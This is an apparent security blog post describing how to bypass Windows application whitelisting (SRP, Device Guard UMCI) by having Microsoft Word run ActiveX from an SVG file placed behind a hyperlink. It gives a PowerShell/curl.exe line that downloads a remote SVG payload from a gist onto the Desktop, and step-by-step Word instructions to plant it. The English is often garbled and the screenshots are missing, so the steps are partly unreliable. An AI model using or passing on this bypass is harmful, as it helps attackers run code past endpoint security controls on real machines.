AWL bypassing highest rules SRP using trust MSFT.Web.Browser

 

112221313
Enter a caption

 

Capture32323

introduction
I conducted in the past few days researches about ActiveX alongside executing upon Microsoft Office a consequently via hyperlink using UNC either anything versus to UNC/Path

[ ! ] Remarking
( Acknowledgements  ) @byt3bl33d3r

Note of Tale If you habitual about use ActiveX inside of Html-Scripting, I bet you have background around use executing AX in internet explorer but currently we have topic it’s rare in Microsoft Office, in fact, Microsoft office 2016 generally don’t read Html-AX and other files like this shape Comparing to file SVG

1 Remarking around files ActiveX in hyperlink it’s don’t working like SVG

2 SVG Document is the only which we can be putting it upon hyperlink it’s the reader lone in Microsoft office their reader named Bhyperlink

As for instance
&-1, let’s go take look at this first step to Create SVG file alongside this strings
&-2  If you have a problem, you can use this reparation
(Raw-SVG)
https://gist.githubusercontent.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0/raw/332b3fa640bb2fff6c59b38a28eaea39b9ec5df6/x000x02.svg

Capture323232323

1 Download besides Creating! the affairs required
2 shouldn’t forget determination venue dropped SVG using $env function
[ Attention ] my tips to you create this file SVG manually

 $obj = $env:HOMEDRIVE + $env:HOMEPATH +"\Desktop\"
curl.exe https://gist.githubusercontent.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0/raw/332b3fa640bb2fff6c59b38a28eaea39b9ec5df6/x000x02.svg >> $obj+x000x02.svg
 

1 We should confirmation upon existing file it’s healthy %100
2 ok…….The file is intact

Capture2.PNG

  • 1 Currently in some sense
  • 2 We should be doing some procedure
  • 3 You will be dropped SVG in hyperlink alongside UNC/Path
  • 4 Microsoft Word is will reading SVG ActiveX without use internet explorer itself
  • 5 Follow the steps!
  • Click > insert > WordArt > Select letters > click with right mouse > hyperlink222.PNG

232323232222.png

There stuff very cool a consequently we should not forget it’s can read ActiveX without use internet explorer leading to bypassing any Platform Secure like Device Guard After update UMCI alongside ( AWL SRP ) bug should use this beside Microsoft Office for the bypass platforms

It’s Active Currently AWL Rules!
Capture3232332323
[ 1 ] Actually we don’t need internet explorer to execute ActiveX

[ 2 ] We will use alongside Microsoft Office to ActiveX executing via SVG Document using Browser Microsoft Office

[ 3 ] remarking This Method is available with SVG Document only inside the Web Browser Microsoft Office

1312121312313.PNG

 

 

 

 

 

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s